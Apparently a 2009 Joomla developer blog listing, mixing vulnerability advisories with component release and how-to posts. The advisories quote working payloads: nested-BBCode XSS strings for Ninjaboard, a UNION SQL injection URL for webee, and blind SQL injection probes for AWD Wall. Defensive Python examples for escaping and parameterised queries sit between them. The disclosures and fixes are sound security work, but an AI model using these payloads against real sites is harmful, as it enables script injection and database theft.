Ninjaboard 0.5.0beta Multiple Vulnerabilities

Posted in Joomla!
2009-11-15 05:00:00 +0000 UTC

The Joomla component Ninjaboard 0.5.0beta suffers from multiple persistent XSS vulnerabilities in its BBCode implementation, as well as a minor CSRF vulnerability and a minor Path Disclosure vulnerability.

  1. XSS 1: Nested [img] Tags

    [img] [img] onerror=javascript:alert(String.fromCharCode(88,83,83)) [/img] [/img]

  2. XSS 2: JavaScript links

    Requires minimal user interaction.

  3. XSS 3: CSS Injection

  4. XSS 4: Nested [url] Tags

    Requires minimal user interaction, displays indications of malware, but still technically exploitable.

    [url][url] onmousemove=javascript:alert(String.fromCharCode(88,83,83));//[/url][/url]

  5. CSRF: [img] Tags

  6. Path Disclosure: Profile View 'id' parameter

    Passing non-numeric values for the 'id' parameter of the profile page results in a Fatal Error, which reveals the full path to components/com_ninjaboard/models/profile.php.


These issues are fixed in the latest release, and users are urged to upgrade.
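The first four items above are all failures of the same kind: the text between BBCode tags ends up inside an HTML attribute without being checked. The following Python is an added illustration written for this page, not Ninjaboard's own parser (which is PHP), and the sample strings in SAMPLES are constructed, modelled on the advisory's payloads. naive_bbcode() shows the unsafe shape, where a javascript: link passes straight into href; hardened_bbcode() escapes everything by default and only emits markup for a body that is a bare absolute http(s) URL containing no brackets, quotes or whitespace, so a nested tag can never become an attribute.

```python
import html
import re
from typing import Optional
from urllib.parse import urlparse

# Constructed sample inputs (not captured from a live forum), modelled on the
# nested-tag and javascript: link cases described in the advisory.
SAMPLES = {
    "good_img": "[img]https://example.com/a.png[/img]",
    "good_url": "[url]https://example.com/page[/url]",
    "js_url": "[url]javascript:alert(1)[/url]",
    "nested_img": "[img] [img] onerror=javascript:alert(1) [/img] [/img]",
    "nested_url": "[url][url] onmousemove=javascript:alert(1);//[/url][/url]",
}

# One pattern for both tags; the backreference keeps [img]...[/img] and
# [url]...[/url] from being paired with each other.
TAG_RE = re.compile(r"\[(img|url)\](.*?)\[/\1\]", re.IGNORECASE | re.DOTALL)


def naive_bbcode(text: str) -> str:
    """The unsafe shape: whatever sits between the tags is dropped straight
    into an attribute value, so a javascript: URL survives untouched."""
    def repl(m):
        tag, body = m.group(1).lower(), m.group(2)
        if tag == "img":
            return f'<img src="{body}">'
        return f'<a href="{body}">{body}</a>'
    return TAG_RE.sub(repl, text)


def safe_link_target(body: str) -> Optional[str]:
    """Accept only an absolute http(s) URL containing nothing that could
    re-open BBCode or HTML syntax (brackets, angle brackets, quotes, spaces).
    Returns the URL, or None if the body must not become markup."""
    candidate = body.strip()
    if not candidate or re.search(r"[\[\]<>\"'\s]", candidate):
        return None
    parts = urlparse(candidate)
    if parts.scheme.lower() not in ("http", "https") or not parts.netloc:
        return None
    return candidate


def hardened_bbcode(text: str) -> str:
    """Walk the input, HTML-escaping every non-tag segment, and emit markup
    only for tags whose body passed safe_link_target(). A tag that fails is
    kept visible but escaped, so nested tags and javascript: links render as
    inert text instead of attributes."""
    out, pos = [], 0
    for m in TAG_RE.finditer(text):
        out.append(html.escape(text[pos:m.start()]))
        tag, body = m.group(1).lower(), m.group(2)
        url = safe_link_target(body)
        if url is None:
            out.append(html.escape(m.group(0)))
        else:
            url = html.escape(url, quote=True)
            if tag == "img":
                out.append(f'<img src="{url}" alt="">')
            else:
                out.append(f'<a href="{url}" rel="nofollow">{url}</a>')
        pos = m.end()
    out.append(html.escape(text[pos:]))
    return "".join(out)


if __name__ == "__main__":
    for name, sample in SAMPLES.items():
        print(f"{name:>10}: {hardened_bbcode(sample)}")
```

The design point is that validation happens on the URL as a whole (scheme, host, character set) before any string is built, and that the fallback for a rejected tag is escaping rather than stripping: stripping tags and re-parsing is exactly what makes nested-tag tricks work.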


webee 1.1.1 Multiple Vulnerabilities

Posted in Joomla!
2009-11-15 05:00:00 +0000 UTC

webee 1.1.1, a Joomla commenting plugin, suffers from multiple vulnerabilities.

  1. SQL Injection

    The 'articleId' parameter is not sanitized.

    index2.php?option=com_webeecomment&task=default&articleId=999 union select 1,2,VERSION(),4,5,6,7,8,9,10,11,12 -- 

  2. [img] BBCode [color] Tag XSS

  3. [url] BBCode [img] Tag XSS

  4. [size] BBCode [url] Tag XSS


UPDATE: webee has been updated to 1.2 as of 12 November 2009 and still suffers from SQL Injection. XSS was not tested in 1.2.
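The webee 'articleId' injection above and the Ninjaboard 'id' path disclosure in the previous post share one root cause: a request parameter that should only ever be an integer is used before it has been coerced to one. The Python below is an added example for this page, not code from either extension (both are PHP); the in-memory table and rows are constructed, and handle_comments_request() is a hypothetical stand-in for a request handler. It shows the three pieces a fix needs: strict integer coercion, a parameterised query, and an error path that returns a generic message instead of a fatal error carrying a file path.

```python
import re
import sqlite3
from typing import Dict, Optional, Tuple

# Plain ASCII decimal digits only. str.isdigit() is not enough here: it
# accepts characters such as superscript digits that int() then rejects.
INT_PARAM_RE = re.compile(r"[0-9]{1,9}")


def parse_int_param(raw: Optional[str]) -> Optional[int]:
    """Return the integer value of a request parameter, or None for anything
    that is not a short string of ASCII digits (missing, 'abc', '999 union ...')."""
    if raw is None or INT_PARAM_RE.fullmatch(raw) is None:
        return None
    return int(raw)


def setup_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for the comment storage."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE comments (id INTEGER PRIMARY KEY, article_id INTEGER, body TEXT)"
    )
    conn.executemany(
        "INSERT INTO comments (article_id, body) VALUES (?, ?)",
        [(1, "first comment"), (1, "second comment"), (2, "other article")],
    )
    conn.commit()
    return conn


def handle_comments_request(
    conn: sqlite3.Connection, params: Dict[str, str]
) -> Tuple[int, object]:
    """Hypothetical handler for ...&task=default&articleId=N, returning an
    (HTTP status, JSON-able body) pair.

    Two defences are combined: the parameter is coerced to an int before it
    is used anywhere, and the query is parameterised, so even a value that
    slipped past validation could not change the SQL structure."""
    article_id = parse_int_param(params.get("articleId"))
    if article_id is None:
        return 400, {"error": "articleId must be a positive integer"}
    try:
        rows = conn.execute(
            "SELECT id, body FROM comments WHERE article_id = ? ORDER BY id",
            (article_id,),
        ).fetchall()
    except sqlite3.Error as exc:
        # Log the detail server-side; the client gets a generic message, never
        # the exception text, which is what leaks file paths in a fatal error.
        print(f"[server log] query failed: {exc!r}")
        return 500, {"error": "internal error"}
    return 200, [{"id": row_id, "body": body} for row_id, body in rows]


if __name__ == "__main__":
    db = setup_db()
    for value in ["1", "2", "abc", "999 union select 1,2,3 -- "]:
        print(repr(value), "->", handle_comments_request(db, {"articleId": value}))
    print("missing ->", handle_comments_request(db, {}))
```

In Joomla 1.5 terms the first piece corresponds to reading the value with an integer-typed request getter rather than the raw request array; the second and third are independent of the framework.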


Joomla Commentator 1.1b3 Admin XSS Vulnerability

Posted in Joomla!
2009-11-15 05:00:00 +0000 UTC

Joomla Commentator 1.1b3, a Joomla commenting plugin, suffers from an XSS vulnerability in its "title" field that could allow an attacker to run script in an administrator's browser session.



JMyLife 1.0 Released

Posted in Joomla!
2009-11-08 23:56:01 +0000 UTC

I am proud to announce the release of JMyLife 1.0, a new Joomla component by yours truly! JMyLife aims to replicate the functionality of in a Joomla 1.5 native component!

There are 2 versions available: JMyLife 1.0 FREE, which has the bare essentials, and JMyLife 1.0 Pro, with all the bells and whistles!

View the demo here - JMyLife Component Demo.

Overview of Features

  Feature                              Free   Pro
  Guest Story Submission               Yes    Yes
  User Comment Submission              Yes    Yes
  Story Voting                         Yes    Yes
  Story Moderation                     Yes    Yes
  Comment Moderation                   Yes    Yes
  Built-in "Share on Facebook" Link    Yes    Yes
  User Comment Reporting               Yes    Yes
  reCAPTCHA on Submission Form         No     Yes
  User Favorites                       No     Yes
  Community Builder Support            No     Yes
  Submission Module                    No     Yes
  Category Menu Module                 No     Yes
  Story/Comment Search Plugin          No     Yes
  Cost                                 FREE   $20

When you purchase the Pro version, ALL minor updates (until 1.1) will be included, and you will be supporting future development of this project.

Menuitem Select in a Custom Component View

Posted in Joomla!
2009-11-07 04:55:18 +0000 UTC

I was doing some restructuring to my soon-to-be-released Joomla component, JMyLife, and wanted to have a select item in the configuration view in order to allow the admin to select a page to direct users to as a "sign up" page. I originally had this item as part of the global view parameters, but I was having issues with Menu Items overriding the global values on specific views. I started digging through the Joomla API documents, expecting to find a simple JHTML statement I could use to produce this form element, but couldn't. I ended up with a solution that works, though I wish it were a bit easier.

Open Joomla Modal With Javascript

Posted in Joomla!
2009-10-29 14:34:09 +0000 UTC

As part of a recent project, I needed to open a modal window using Javascript. Here's how I did it.

Install Multiple Joomla Extensions in a Single Package

Posted in Joomla!
2009-10-24 19:47:38 +0000 UTC

Lately in my spare time, I've been working on a new Extension collection for my new site, I Hate My Neighbors. I'm planning on releasing this one as a commercial component soon, and as such I wanted to make sure the install process was as simple as possible. Since the component has some plugins and modules that go along with it, I decided it should go ahead and install everything from a single package. Here's how I did it.

JS Jobs Search Plugin

Posted in Joomla!
2009-10-24 19:32:31 +0000 UTC

Not too long ago a client of mine wanted to have entries from JS Jobs show up in the general Joomla search results. I went ahead and wrote up this quick and dirty search plugin for JS Jobs.

AWD Wall 1.5 Blind SQL Injection Vulnerability

Posted in Joomla!
2009-10-16 05:19:48 +0000 UTC

The Joomla component AWD Wall 1.5 suffers from a blind SQL injection vulnerability in its handling of the 'cbuser' parameter.

?option=com_awdwall&view=awdwall&cbuser=62 and 1=1 limit 1 -- '
?option=com_awdwall&view=awdwall&cbuser=62 and 1=2 limit 1 -- '

Joomla Issues with Subdomains

Posted in Joomla!
2009-09-24 23:24:16 +0000 UTC

While working on a Joomla! site lately, I had an interesting issue arise. None of my scripts or CSS styles would load on a Joomla site installed on a subdomain. Luckily I was able to solve this quickly.